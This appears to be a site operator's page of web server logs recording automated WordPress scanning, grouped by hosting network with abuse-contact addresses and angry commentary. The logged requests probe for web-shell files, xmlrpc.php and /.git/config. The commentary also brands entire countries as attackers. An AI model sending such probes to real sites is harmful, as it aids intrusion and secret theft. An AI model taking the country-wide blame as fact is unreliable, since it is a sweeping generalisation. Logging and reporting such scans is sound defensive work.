185.77.218.9 website*x.com – – [05/Oct/2025:13:09:27 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:28 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:28 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:28 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:28 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:29 +0200] „GET /2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:30 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:30 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:30 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:30 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:30 +0200] „GET /media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:31 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:31 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:31 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:31 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
+
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:36 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:36 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:37 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:37 +0200] „GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:37 +0200] „GET /web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:37 +0200] „GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:37 +0200] „GET /website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:37 +0200] „GET /wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:37 +0200] „GET /news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:37 +0200] „GET /2018/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:38 +0200] „GET /2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:38 +0200] „GET /shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:38 +0200] „GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:38 +0200] „GET /test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:38 +0200] „GET /media/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:39 +0200] „GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:39 +0200] „GET /site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:40 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
185.77.218.9 website*x.com – – [05/Oct/2025:13:09:40 +0200] „GET /sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“

AS18881 – TELEFÔNICA BRASIL S.A – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
BRAZIL IS COMPLETE UNWANTED AND COMPLETE BLOCKED!!! – TO MANY HACKER-IDIOTS EVERY DAY!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2804:1b2:1848:532c:dcb0:1090:a389:64c0 website*x.com – – [05/Oct/2025:14:27:17 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

ABUSE-MAIL NR. 14 – WEEKEND!

abuse-reports@cloudzy.com, abuse@mts.by

AS14956 – RouterHosting LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:01:37 +0200] „GET /wp-admin/css/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:02:15 +0200] „GET /wp-includes/SimplePie/Content/Type/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:02:47 +0200] „GET /wp-includes/Requests/Auth/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:03:06 +0200] „GET /wp-admin/css/colors/index.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:03:38 +0200] „GET /wp-content/languages/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:04:00 +0200] „GET /wp-content/upgrade/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:04:27 +0200] „GET /wp-content/IXR/index.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:04:37 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:04:38 +0200] „GET /wp-content/plugins/about.php HTTP/1.0“ 403 – „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:04:39 +0200] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:04:42 +0200] „GET /geju.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:04:43 +0200] „GET /wp.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
2605:7980:0:2038::1 website*x.com – – [05/Oct/2025:02:04:45 +0200] „GET /wp.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS25106 – Mobile TeleSystems JLLC – AGAIN AND AGAIN!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
ALSO BELARUS IS COMPLETE UNWANTED AND COMPLETE BLOCKED!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
134.17.14.34 website*x.com – – [05/Oct/2025:03:49:36 +0200] „GET /style.php HTTP/1.0“ 302 20 „-“ „Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)“

ABUSE-MAIL NR. 15 – WEEKEND!

admin@frantech.ca,google-cloud-compliance@google.com, network-abuse@google.com

AS53667 – FranTech Solutions – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
45.61.186.39 www.website*x.com – – [05/Oct/2025:08:53:39 +0200] „GET /wp-json/sure-triggers/v1/automation/action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36“
45.61.186.39 www.website*x.com – – [05/Oct/2025:09:03:49 +0200] „GET / HTTP/1.0“ 403 – „http://www.google.com.hk“ „Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36“

AS396982 – Google LLC – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:29 +0200] „GET //wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:29 +0200] „GET //xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:29 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:29 +0200] „GET //blog/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:30 +0200] „GET //web/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:30 +0200] „GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:30 +0200] „GET //website/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:31 +0200] „GET //wp/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:31 +0200] „GET //news/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:31 +0200] „GET //2020/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:31 +0200] „GET //2019/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:31 +0200] „GET //shop/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:31 +0200] „GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:31 +0200] „GET //test/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:31 +0200] „GET //wp2/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:32 +0200] „GET //site/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:32 +0200] „GET //cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“
34.45.65.104 www.website*x.com – – [05/Oct/2025:13:26:32 +0200] „GET //sito/wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36“

ABUSE-MAIL NR. 16 – WEEKEND!

abuse@metaspinner.net,admin@frantech.ca

AS53667 – FranTech Solutions – AGAIN AND AGAIN EVERY DAY!!! – VERY IGNORANT AND UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
209.141.32.143 www.website*x.de – – [05/Oct/2025:11:24:06 +0200] „GET /wp-content/plugins/nextend-social-login-pro/readme.txt HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.1.2.3 Safari/537.36 Edg/121.0.623.86“

AS209800 – metaspinner net GmbH – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
178.16.55.233 www.website*x.de – – [05/Oct/2025:12:27:22 +0200] „GET /oam/server/opensso/sessionservice HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Debian; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0“

ABUSE-MAIL NR. 17 – WEEKEND!

abuse@telekom.si,abuse@rcs-rds.ro,abuse@convergeict.com,report_abuse@infinivan.com

AS5603 – Telekom Slovenije, d.d. – IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
FIRST ABUSE-MAIL! WE ARE WAITING FOR ANSWER!!!
89.143.123.96 website*x.com – – [05/Oct/2025:15:19:03 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS8708 – DIGI ROMANIA S.A. – AGAIN AND AGAIN EVERY WEEKEND!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
86.127.114.174 website*x.com – – [05/Oct/2025:15:19:04 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS135607 – Infinivan Incorporated – AGAIN AND AGAIN EVERY WEEKEND!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
126.209.3.242 website*x.com – – [05/Oct/2025:15:22:06 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; arm64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/100.0.0.0 Safari/537.36“

AS17639 – Converge ICT Solutions Inc. – AGAIN AND AGAIN EVERY WEEKEND!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
136.158.46.240 website*x.com – – [05/Oct/2025:15:29:14 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; x86) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 18 – WEEKEND!

hm-changed@vnnic.vn,soc@viettel.com.vn,abuse@microsoft.com, msftcs@microsoft.com,cert@microsoft.com,abuse@virtualine.org

AS7552 – Viettel Group – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
VIETNAM IS COMPLETE UNWANTED AND COMPLETE BLOCKED! TO MANY HACKER-IDIOTS EVERY DAY AND VERY IGNORANT PROVIDER!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
27.74.197.239 website*x.com – – [05/Oct/2025:18:34:51 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

AS214940 – KPROHOST LLC – AGAIN AND AGAIN EVERY WEEKEND!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT!
213.209.157.253 website*x.com – – [06/Oct/2025:07:06:08 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „EmailWolf 1.00“

AS8075 – Microsoft Corporation – AGAIN AND AGAIN EVERY DAY!!! – VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
HERE WITH 2 IP´S!!! – WE REPORT THIS SINCE WEEKS AND MICROSOFT DOES NOTHING!!!
NO RESPONSE… NO ANSWER… NOTHING IN OUR ABUSE EMAILS! THIS IS VERY IGNORANT! – ABUSE PER EMAIL IS STANDARD!!!
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:25 +0200] „GET /aa.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:26 +0200] „GET /about.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:26 +0200] „GET /admin.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:26 +0200] „GET /akc.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:27 +0200] „GET /alfa.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:27 +0200] „GET /asasx.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:27 +0200] „GET /atomlib.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:28 +0200] „GET /autoload_classmap.php HTTP/1.0“ 302 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:28 +0200] „GET /autoload_classmap/function.php HTTP/1.0“ 403 – „-“ „-“
20.163.114.9 website*x.com – – [06/Oct/2025:01:19:28 +0200] „GET /buy.php HTTP/1.0“ 403 – „-“ „-“
